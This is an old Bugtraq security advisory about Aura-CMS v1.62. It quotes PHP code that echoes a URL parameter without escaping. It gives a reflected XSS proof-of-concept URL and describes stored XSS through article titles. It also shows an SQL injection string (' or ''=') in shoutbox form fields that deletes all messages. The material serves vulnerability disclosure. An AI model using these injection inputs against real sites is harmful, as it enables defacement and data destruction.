Date: Thu, 06 Jul 2006 21:23:23 +0700
From: "k07iX" <apem-zigzag@...kom.net>
To: bugtraq@...urityfocus.com
Subject: lintah_|adv|_01@...6>=========<[Aura-CMS v1.62]<===>[XSS
 vulnerable]&[bug]

by : iFX a.k.a inversFX
  _______________________________
[	apem-zigzag@...kom.net	]
[	inversfx@...oo.com	]
  -------------------------------
locate : Indonesia, Jakarta
--------------------------------
date   : 29/06/2006
--------------------------------
title  : XSS on `CMS Aura v1.62`
--------------------------------
Developer CMS : Arif Supriyanto - arif@....kliksini.com
   	        http://www.auracms.tk
                 http://www.semarang.tk
	        http://www.ayo.kliksini.com
  	        http://www.auracms.opensource-indonesia.com
--------------------------------

PoC :

1.  in 'teman.php' we can see the code :

echo "<p class=judul>Kirim ke Teman</p>
artikel ini yang berjudul
: <b>$judul_artikel</b>.";

	we found something here, that's variable $judul_artikel
	so we can xss from the url :

	1st ex:
	http://localhost/teman.php?judul_artikel=<script>alert("mati
dah gwa!!!")</script>

         2nd ex:
	or we can send an artikel to admin and the title had the
XSS code, so when anonymous is
	opening the index.php, the script are running.

2.  we found something here that can be delete all
shoutbox message.
	as usually we can shout anonymously with fake name, mail,
pesan.
	here when I insert

name  = ' or ''='                       <== old SQL
injection code
mail  = test_string			<== you can fill it with free mail
address
pesan = ' or ''='			<== old SQL injection code

then all message on it clear amazingly....

screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt

sory for my words In English, cuz I often REMED!!!

       /Shout :|       |X|
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom
kommunity, all hacker kommunity|
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius,
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe,
Shock-3d, G4mMa, Big_Red_One }    |
							       |OK | Apply | Cancel |